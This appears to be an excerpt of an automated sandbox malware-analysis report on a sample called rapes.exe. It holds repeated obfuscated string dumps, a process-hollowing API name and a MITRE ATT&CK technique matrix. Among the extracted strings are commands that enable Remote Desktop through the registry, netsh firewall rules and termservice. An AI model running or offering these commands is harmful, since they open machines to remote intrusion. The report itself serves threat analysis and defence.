I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: rapes.exe, 00000013.00000002.1010976873.0000000000431000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: net start termservice
                      Source: rapes.exe, 00000013.00000002.1010976873.0000000000431000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: rapes.exeString found in binary or memory: net start termservice
                      Source: rapes.exe, 00000014.00000003.987805993.0000000004C40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: rapes.exe, 00000014.00000003.987805993.0000000004C40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: rapes.exe, 00000014.00000002.1028077488.0000000000431000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: net start termservice
                      Source: rapes.exe, 00000014.00000002.1028077488.0000000000431000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: rapes.exeString found in binary or memory: net start termservice
                      Source: rapes.exe, 0000001C.00000003.1515506274.0000000004C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: rapes.exe, 0000001C.00000003.1515506274.0000000004C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: rapes.exe, 0000001C.00000002.2109764248.0000000000431000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: net start termservice
                      Source: rapes.exe, 0000001C.00000002.2109764248.0000000000431000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00981204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,34_2_00981204
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00981806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,34_2_00981806
MITRE ATT&CK matrix (one column per tactic; a leading number is the technique's hit-count badge as rendered in the report):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 11 Scripting | 2 Valid Accounts | 121 Windows Management Instrumentation | 11 Scripting | 1 Exploitation for Privilege Escalation | 421 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | 1 Remote Desktop Protocol | 1 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 12 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 11 Account Discovery | Remote Desktop Protocol | 31 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 2 Valid Accounts | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 12 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 11 Scheduled Task/Job | 11 Scheduled Task/Job | 2 Bypass User Account Control | 4 Obfuscated Files or Information | NTDS | 2410 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | 2 PowerShell | 11 Registry Run Keys / Startup Folder | 1 Extra Window Memory Injection | 12 Software Packing | LSA Secrets | 1091 Security Software Discovery | SSH | 3 Clipboard Data | 114 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Valid Accounts | 1 DLL Side-Loading | Cached Domain Credentials | 581 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 21 Access Token Manipulation | 2 Bypass User Account Control | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | 512 Process Injection | 1 Extra Window Memory Injection | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
